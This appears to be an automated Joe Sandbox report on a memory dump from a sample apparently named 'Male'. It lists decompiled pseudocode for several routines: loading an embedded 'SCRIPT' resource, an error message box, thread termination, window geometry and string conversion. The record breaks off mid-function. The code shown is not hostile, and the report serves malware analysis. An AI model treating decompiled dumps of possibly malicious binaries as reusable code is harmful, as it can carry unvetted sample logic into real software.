Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 63c94d8607b52c86935f5c4f1146b0e044da9fe338cb901fd2d28476c76beef1
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 5D110371940B2ABAD921FBF4CC4DFCB77DC7F24704F804815A3A9A61E0EA75B5144750

Uniqueness

Uniqueness Score: -1.00%

Function 014238E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E014238E0(void* __eax, void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr* _t12;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				struct HRSRC__* _t22;
				void* _t24;
				void* _t25;
				void* _t26;

				_t10 = __eax;
				_t26 = __ecx;
				_t14 = __ecx + 0x10;
				__imp__CreateStreamOnHGlobal(0, 1, _t14, _t25, _t13, __ecx);
				if(__eax < 0) {
					L7:
					return _t10;
				} else {
					_t10 = FindResourceExW( *(__ecx + 0xc), 0xa, L"SCRIPT", 0);
					_t22 = _t10;
					if(_t22 != 0) {
						_t10 = LoadResource( *(_t26 + 0xc), _t22);
						_v8 = _t10;
						if(_t10 != 0) {
							_t10 = SizeofResource( *(_t26 + 0xc), _t22);
							_t24 = _t10;
							if(_t24 != 0) {
								_t10 = LockResource(_v8);
								if(_t10 != 0) {
									_t17 =  *_t14;
									 *((intOrPtr*)( *_t17 + 0x10))(_t17, _t10, _t24, 0);
									_t12 =  *_t14;
									_t10 =  *((intOrPtr*)( *_t12 + 0x14))(_t12, 0, 0, 0, 0);
									 *((char*)(_t26 + 0x14)) = 1;
								}
							}
						}
					}
					goto L7;
				}
			}

0x014238e0
0x014238e6
0x014238e8
0x014238f0
0x014238f8
0x01423960
0x01423963
0x014238fa
0x01423907
0x0142390d
0x01423911
0x01423917
0x0142391d
0x01423922
0x01423928
0x0142392e
0x01423932
0x01423937
0x0142393f
0x01423941
0x0142394a
0x0142394d
0x01423958
0x0142395b
0x0142395b
0x0142393f
0x01423932
0x01423922
0x00000000
0x0142395f

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,013F3BC0,?,?,00000000,00000000), ref: 014238F0
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,013F3BC0,?,?,00000000,00000000), ref: 01423907
LoadResource.KERNEL32(?,00000000,?,?,013F3BC0,?,?,00000000,00000000,?,?,?,?,?,?,013B2C35), ref: 01423917
SizeofResource.KERNEL32(?,00000000,?,?,013F3BC0,?,?,00000000,00000000,?,?,?,?,?,?,013B2C35), ref: 01423928
LockResource.KERNEL32(013F3BC0,?,?,013F3BC0,?,?,00000000,00000000,?,?,?,?,?,?,013B2C35,?), ref: 01423937

Strings

SCRIPT, xrefs: 014238FD

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: edb72d8d87e5b017179af8203de756c7a766aa40b8d5b22f974c8f568e98e5fa
Instruction ID: 66365d04b8e37f326dc7a94d3daf0c2f411493e2a8b96fe569383ce560ed4593
Opcode Fuzzy Hash: edb72d8d87e5b017179af8203de756c7a766aa40b8d5b22f974c8f568e98e5fa
Instruction Fuzzy Hash: 2C115A74600701AFE7218BA9DC48F277FB9FBC9B61F144169F60696264DB71E8408A20

Uniqueness

Uniqueness Score: -1.00%

Function 0141E1D0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E0141E1D0(int __ecx, intOrPtr _a8) {
				short _v520;
				short _v1036;

				LoadStringW(GetModuleHandleW(0), __ecx,  &_v520, 0x100);
				LoadStringW(GetModuleHandleW(0), 0x1389,  &_v1036, 0x100);
				if(_a8 == 0) {
					return MessageBoxW(0,  &_v1036,  &_v520, 0x11010);
				}
				_push(0x144dbf4);
				_push(0x144dbf4);
				_push( &_v1036);
				_push(0);
				return E0141A3F3(L"%s (%d) : ==> %s: \n%s \n%s\n",  &_v520);
			}

0x0141e1f1
0x0141e20e
0x0141e217
0x00000000
0x0141e252
0x0141e21e
0x0141e21f
0x0141e226
0x0141e227
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0141E1EA
LoadStringW.USER32(00000000), ref: 0141E1F1
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0141E207
LoadStringW.USER32(00000000), ref: 0141E20E
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0141E252

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0141E22F

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 7cff79e51dd24b72ba31e8162bfa92d0c84814d83f1a2414783aee5eabe67685
Instruction ID: 1ba27cefdf1e39f09fb6ac99d3281cac9dbeecc8138e1dde5497c4560e68005d
Opcode Fuzzy Hash: 7cff79e51dd24b72ba31e8162bfa92d0c84814d83f1a2414783aee5eabe67685
Instruction Fuzzy Hash: 760181FAD002087FE721E7E4CD89EE7776CEB18200F4045A6BB4AE2055EA749E844B71

Uniqueness

Uniqueness Score: -1.00%

Function 014211AF, Relevance: 10.5, APIs: 7, Instructions: 35
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E014211AF(void* __ecx) {
				void* _t10;
				long _t11;
				LONG* _t16;
				void* _t19;
				struct _CRITICAL_SECTION* _t21;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x30)) != 0) {
					_t16 = __ecx + 0x34;
					_t11 = InterlockedExchange(_t16,  *_t16);
					if(_t11 != 0x1f6) {
						_t21 = _t19 + 0x14;
						EnterCriticalSection(_t21);
						TerminateThread( *(_t19 + 0x30), 0x1f6);
						WaitForSingleObject( *(_t19 + 0x30), 0x3e8);
						if( *(_t19 + 0x30) != 0) {
							CloseHandle( *(_t19 + 0x30));
							 *(_t19 + 0x30) =  *(_t19 + 0x30) & 0x00000000;
						}
						_t11 = InterlockedExchange(_t16, 0x1f6);
						LeaveCriticalSection(_t21);
					}
					return _t11;
				}
				return _t10;
			}

0x014211b0
0x014211b6
0x014211b9
0x014211bf
0x014211ca
0x014211cd
0x014211d1
0x014211df
0x014211ed
0x014211f7
0x014211fc
0x01421202
0x01421202
0x0142120c
0x01421213
0x01421219
0x00000000
0x0142121a
0x0142121c

APIs

InterlockedExchange.KERNEL32(?,?), ref: 014211BF
EnterCriticalSection.KERNEL32(00000000,?), ref: 014211D1
TerminateThread.KERNEL32(00000000,000001F6), ref: 014211DF
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 014211ED
CloseHandle.KERNEL32(00000000), ref: 014211FC
InterlockedExchange.KERNEL32(?,000001F6), ref: 0142120C
LeaveCriticalSection.KERNEL32(00000000), ref: 01421213

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 2e2ec0add0bb68bd5bd3ce9b54c85d884bbeb4243eb631e3e8d9b989422bbece
Instruction ID: 797d25ffc8594862a15105279f6ac594c81f6ff670a454ad17de1dbd7336f9ce
Opcode Fuzzy Hash: 2e2ec0add0bb68bd5bd3ce9b54c85d884bbeb4243eb631e3e8d9b989422bbece
Instruction Fuzzy Hash: A6F04F32950612BBD3655FA4ED4CBC6BB39FF15712F801121F202928B48774A4B0CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013B6AAD, Relevance: 9.3, APIs: 6, Instructions: 276
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E013B6AAD(signed int _a4, signed int _a8, signed int _a12) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				signed int _t172;
				struct HWND__* _t175;
				struct HWND__* _t181;
				signed int _t187;
				signed int _t200;
				signed int _t202;
				signed int _t207;
				signed int _t213;
				struct HWND__* _t217;
				signed int _t248;
				signed int _t253;
				signed int _t257;
				signed int _t258;
				signed char _t259;
				signed int _t260;
				struct HWND__* _t261;
				long _t262;
				signed int _t263;
				long _t264;
				signed int _t266;
				signed int _t273;
				signed int _t274;
				signed int _t280;
				signed int _t281;
				struct HWND__** _t285;
				signed int _t286;
				signed int _t289;
				struct HWND__** _t291;

				_t291 = _a8;
				_t285 = _a4;
				if(_t285[0xe] != 0) {
					_t291[0x22] = _t285[0x16];
					_t291[0x22] = _t285[0x17];
					if(_t291[0x24] == 7) {
						if(_a12 == 0) {
							L20:
							GetClientRect( *_t291,  &_v40);
							_t258 = _t257 | 0xffffffff;
							if(_t285[0x16] == _t258) {
								_t291[0x22] = _v40.left;
							}
							if(_t285[0x17] == _t258) {
								_t291[0x22] = _v40.top;
							}
							_t172 = GetWindowRect( *_t291,  &_v40);
							if(_t285[0x18] == _t258) {
								_t172 = _v40.right.x - _v40.left;
								_t291[0x23] = _t172;
							}
							if(_t285[0x19] == _t258 || _t291[0x24] == 0) {
								_t175 = _v40.bottom - _v40.top;
								L50:
								_t291[0x23] = _t175;
								return _t175;
							} else {
								L17:
								return _t172;
							}
						}
					}
					_t291[0x23] = _t285[0x18];
					_t291[0x23] = _t285[0x19];
					goto L20;
				}
				_t259 = _t291[0x21] & 0x0000ffff;
				GetClientRect( *_t285,  &_v56);
				_t273 = _v56.right;
				_t260 = _v56.bottom;
				_a8 = _t285[0x11];
				_t181 = _t285[0x12];
				_a12 = _t273;
				_v16 = _t260;
				_v12 = _t181;
				if(_t273 == 0) {
					_t274 = _a8;
					_a12 = 1;
					if(_t274 != 0) {
						_a12 = _t274;
					}
				}
				if(_t260 == 0) {
					if(_t181 != 0) {
						_t261 = _t181;
					} else {
						_t261 = 1;
					}
					_v16 = _t261;
				}
				if(_t285[0x67] != 0) {
					_v12 = _v12 - GetSystemMetrics(0xf);
				}
				GetWindowRect( *_t291,  &_v56);
				_t262 = _v56.left;
				_a4 = _v56.right - _t262;
				_t187 = _v56.top;
				_v40.bottom = _t187;
				_v20 = _v56.bottom - _t187;
				_v40.right.x = _t262;
				ScreenToClient( *_t285,  &(_v40.right));
				_t286 = _v12;
				_t263 = _v16;
				asm("cdq");
				_t291[0x22] = _v40.right.x * _a8 / _a12;
				asm("cdq");
				_t291[0x22] = _v40.bottom * _t286 / _t263;
				asm("cdq");
				_t291[0x23] = _a4 * _a8 / _a12;
				_t200 = _v20 * _t286;
				asm("cdq");
				_t172 = _t200 / _t263;
				_t280 = _t200 % _t263;
				_t291[0x23] = _t172;
				if(_t259 == 0) {
					goto L17;
				} else {
					if((_t259 & 0x00000100) != 0) {
						_t291[0x23] = _a4 & 0x0000ffff;
						if((_t259 & 0x00000006) == 0) {
							if((_t259 & 0x00000008) != 0) {
								asm("cdq");
								_t291[0x22] = _v40.right.x - (_a8 - _a12 - _t280 >> 1);
								_t263 = _v16;
							} else {
								asm("cdq");
								_t248 = _a12 - _t280;
								_t280 = _v40.right.x;
								if(_t280 > _t248 >> 1) {
									_t253 = (_t280 - _a12 + _a4) * _a8;
									asm("cdq");
									_t280 = _a4 & 0x0000ffff;
									_t286 = _v12;
									_t291[0x22] = _t253 / _a12 - _t280 + _a8;
								}
							}
						}
					}
					if((_t259 & 0x00000200) == 0) {
						L42:
						_t281 = _v40.bottom;
						L13:
						_t264 = _v40.right.x;
						_t202 = _t259 & 0x00000002;
						_v24 = _t202;
						if(_t202 != 0) {
							_t291[0x22] = _t264;
						}
						if((_t259 & 0x00000004) != 0) {
							_a12 = _a12 & 0x0000ffff;
							_a8 = _a8 & 0x0000ffff;
							_t286 = _v12;
							_t207 = _a4 & 0x0000ffff;
							if(_v24 == 0) {
								_t291[0x22] = _t207 - _a12 - _t291[0x23] + _a8 + _t264;
							} else {
								_t291[0x23] = _t207 - _a12 - _t291[0x22] + _a8 + _t264;
							}
						}
						_t172 = _t259 & 0x00000020;
						_a12 = _t172;
						if(_t172 != 0) {
							_t291[0x22] = _t281;
						}
						if((_t259 & 0x00000040) != 0) {
							_t213 = _t286 & 0x0000ffff;
							_t266 = _v16 & 0x0000ffff;
							_t289 = _v20 & 0x0000ffff;
							if(_a12 == 0) {
								_t217 = _t213 - _t266 - _t291[0x23] + _t289 + _t281;
								_t291[0x22] = _t217;
								return _t217;
							}
							_t175 = _t213 - _t291[0x22] - _t266 + _t289 + _t281;
							goto L50;
						} else {
							goto L17;
						}
					}
					_t291[0x23] = _v20 & 0x0000ffff;
					if((_t259 & 0x00000060) != 0) {
						goto L42;
					}
					if(_t259 < 0) {
						asm("cdq");
						_t281 = _v40.bottom;
						_t291[0x22] = _t281 - (_t286 - _t263 - _t280 >> 1);
						goto L13;
					}
					asm("cdq");
					_t281 = _v40.bottom;
					if(_t281 > _t263 - _t280 >> 1) {
						asm("cdq");
						_t291[0x22] = (_t281 - _t263 + _v20) * _t286 / _t263 - (_v20 & 0x0000ffff) + _t286;
						goto L42;
					}
					goto L13;
				}
			}

0x013b6ab5
0x013b6ab9
0x013b6ac0
0x013b6c4a
0x013b6c55
0x013b6c5c
0x013b6cc7
0x013b6c74
0x013b6c7a
0x013b6c80
0x013b6c86
0x013f5a99
0x013f5a99
0x013b6c8f
0x013f5aa9
0x013f5aa9
0x013b6c9b
0x013b6ca4
0x013f5ab8
0x013f5abb
0x013f5abb
0x013b6cad
0x013b6cbb
0x013f5c29
0x013f5c29
0x00000000
0x013b6c3c
0x013b6c3c
0x013b6c3c
0x013b6c3c
0x013b6cad
0x013b6cc9
0x013b6c62
0x013b6c6d
0x00000000
0x013b6c6d
0x013b6ac6
0x013b6ad3
0x013b6adc
0x013b6adf
0x013b6ae2
0x013b6ae5
0x013b6ae8
0x013b6aeb
0x013b6aee
0x013b6af3
0x013f5ac7
0x013f5aca
0x013f5ad3
0x013f5ad9
0x013f5ad9
0x013f5ad3
0x013b6afb
0x013f5ae3
0x013f5aea
0x013f5ae5
0x013f5ae7
0x013f5ae7
0x013f5aec
0x013f5aec
0x013b6b08
0x013f5afc
0x013f5afc
0x013b6b14
0x013b6b1d
0x013b6b25
0x013b6b28
0x013b6b2d
0x013b6b36
0x013b6b39
0x013b6b3c
0x013b6b49
0x013b6b4c
0x013b6b4f
0x013b6b53
0x013b6b60
0x013b6b63
0x013b6b71
0x013b6b75
0x013b6b7f
0x013b6b82
0x013b6b83
0x013b6b83
0x013b6b85
0x013b6b8f
0x00000000
0x013b6b95
0x013b6b9b
0x013b6ba3
0x013b6bad
0x013b6bb2
0x013f5b0d
0x013f5b14
0x013f5b1b
0x013b6bb8
0x013b6bbb
0x013b6bbc
0x013b6bbe
0x013b6bc5
0x013f5b2e
0x013f5b32
0x013f5b36
0x013f5b39
0x013f5b41
0x013f5b41
0x013b6bc5
0x013b6bb2
0x013b6bad
0x013b6bd1
0x013f5b87
0x013f5b87
0x013b6c07
0x013b6c07
0x013b6c0c
0x013b6c0f
0x013b6c12
0x013f5b8f
0x013f5b8f
0x013b6c1b
0x013f5bac
0x013f5bb2
0x013f5bb5
0x013f5bb8
0x013f5bbb
0x013f5beb
0x013f5bbd
0x013f5bce
0x013f5bce
0x013f5bbb
0x013b6c23
0x013b6c26
0x013b6c29
0x013f5bf7
0x013f5bf7
0x013b6c32
0x013f5c0b
0x013f5c11
0x013f5c14
0x013f5c17
0x013f5c41
0x013f5c44
0x00000000
0x013f5c44
0x013f5c26
0x00000000
0x00000000
0x00000000
0x00000000
0x013b6c32
0x013b6bdd
0x013b6be7
0x00000000
0x00000000
0x013b6bef
0x013f5b51
0x013f5b54
0x013f5b5d
0x00000000
0x013f5b5d
0x013b6bf7
0x013b6bfa
0x013b6c01
0x013f5b73
0x013f5b80
0x00000000
0x013f5b80
0x00000000
0x013b6c01

APIs

GetClientRect.USER32 ref: 013B6AD3
GetWindowRect.USER32 ref: 013B6B14
ScreenToClient.USER32 ref: 013B6B3C
GetClientRect.USER32 ref: 013B6C7A
GetWindowRect.USER32 ref: 013B6C9B

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: c388a8594acdca66a3d534caa7ece3d7689a5f379ce6b4dce03953e53be729a6
Instruction ID: 3be1cf6be7fdca69da9a405ac7406153bde530870df9b947f0d41b32e09ae3cd
Opcode Fuzzy Hash: c388a8594acdca66a3d534caa7ece3d7689a5f379ce6b4dce03953e53be729a6
Instruction Fuzzy Hash: C3B17C74A0074ADBDF10CFA9C4816EEBBF1FF48314F04851AEAA9D7A50EB30A951CB54

Uniqueness

Uniqueness Score: -1.00%

Function 013E661E, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E013E661E(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x147d014; // 0xf9c9c506
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E013F0242(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E013D0EAC(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E013E18C7(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E013E3887(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E013E18C7(_t101);
									goto L36;
								}
								_t62 = E013E3887(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E013E18C7(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E013E3C40(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E013F2460();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E013E3887(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E013E3C40(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E013F2460();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x013e6623
0x013e6624
0x013e6625
0x013e662c
0x013e6630
0x013e6631
0x013e6637
0x013e663d
0x013e6643
0x013e6646
0x013e6646
0x013e6649
0x013e664b
0x013e664b
0x013e6649
0x013e664d
0x013e6652
0x013e6659
0x013e665c
0x013e665c
0x013e6678
0x013e667e
0x013e6683
0x013e6816
0x013e6829
0x013e6689
0x013e6689
0x013e668c
0x013e6691
0x013e6695
0x013e66e9
0x013e66e9
0x013e66eb
0x013e66ed
0x013e680b
0x013e680b
0x013e680d
0x013e680e
0x00000000
0x013e6814
0x013e66fe
0x013e6704
0x013e6706
0x00000000
0x00000000
0x013e670c
0x013e671e
0x013e6723
0x013e6727
0x00000000
0x00000000
0x013e6734
0x013e676e
0x013e6771
0x013e6774
0x013e6776
0x013e6778
0x013e677a
0x013e67c6
0x013e67c6
0x013e67c8
0x013e67c8
0x013e67ca
0x013e6804
0x013e6805
0x00000000
0x013e680a
0x013e67de
0x013e67e3
0x013e67e5
0x00000000
0x00000000
0x013e67e9
0x013e67ea
0x013e67eb
0x013e67ee
0x013e682a
0x013e682d
0x013e67f0
0x013e67f0
0x013e67f1
0x013e67f1
0x013e67fe
0x013e6800
0x013e6802
0x013e6833
0x00000000
0x00000000
0x00000000
0x00000000
0x013e6802
0x013e677c
0x013e677f
0x013e6781
0x013e6783
0x013e6785
0x013e6788
0x013e678d
0x013e67a8
0x013e67aa
0x013e67b4
0x013e67b6
0x013e67b7
0x013e67b9
0x00000000
0x00000000
0x013e67bb
0x013e67c1
0x013e67c1
0x00000000
0x013e67c1
0x013e678f
0x013e6791
0x013e6795
0x013e679a
0x013e679c
0x013e679e
0x00000000
0x00000000
0x013e67a0
0x00000000
0x013e67a0
0x013e6736
0x013e673b
0x00000000
0x00000000
0x013e6741
0x013e6743
0x00000000
0x00000000
0x013e675a
0x013e675f
0x013e6763
0x00000000
0x00000000
0x00000000
0x013e6769
0x013e669c
0x013e669e
0x013e66a0
0x013e66a8
0x013e66c7
0x013e66c9
0x013e66d3
0x013e66d5
0x013e66d6
0x013e66d8
0x00000000
0x00000000
0x013e66de
0x013e66e4
0x013e66e4
0x00000000
0x013e66e4
0x013e66ac
0x013e66b0
0x013e66b5
0x013e66b9
0x00000000
0x00000000
0x013e66bf
0x00000000
0x013e66bf

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,013D86F9,013D86F9,?,?,?,013E686F,00000001,00000001,8BE85006), ref: 013E6678
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,013E686F,00000001,00000001,8BE85006,?,?,?), ref: 013E66FE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 013E67F8
__freea.LIBCMT ref: 013E6805

Part of subcall function 013E3C40: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,013D0215,00000000,?,013B8E5F,00000004,?,013F4C6B,?,?,013B10E8,0144DBF4), ref: 013E3C72

__freea.LIBCMT ref: 013E680E
__freea.LIBCMT ref: 013E6833

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 3275f3aa1669dba51679f0051f5504a685494169d55143c43c066bded8c237be
Instruction ID: e453c666448166e268765249eda911463325be8c621904ecaf0217d61ad7445a
Opcode Fuzzy Hash: 3275f3aa1669dba51679f0051f5504a685494169d55143c43c066bded8c237be
Instruction Fuzzy Hash: 8B51D4F2610726ABEB258F68CC4AEAB7FE9EF64658F144628FD04D61C0EB35DC408650

Uniqueness

Uniqueness Score: -1.00%

Function 0140FFCC, Relevance: 9.2, APIs: 6, Instructions: 183
memoryCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E0140FFCC(short* __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				char _v24;
				short* _t32;
				signed int _t34;

				_t32 = __ecx;
				__imp__#8(__ecx);
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				_t5 =  *((intOrPtr*)(_a4 + 0xc)) - 1; // 0xe
				_t34 = _t5;
				if(_t34 > 0xe) {
					L33:
					return _t32;
				}
				switch( *((intOrPtr*)(_t34 * 4 +  &M014101CC))) {
					case 0:
						_push(3);
						_pop(__eax);
						__ecx = __edi;
						 *__ebx = __ax;
						__eax = E013BCE08(__edi);
						goto L4;
					case 1:
						_push(0x14);
						_pop(__eax);
						__ecx = __edi;
						 *__ebx = __ax;
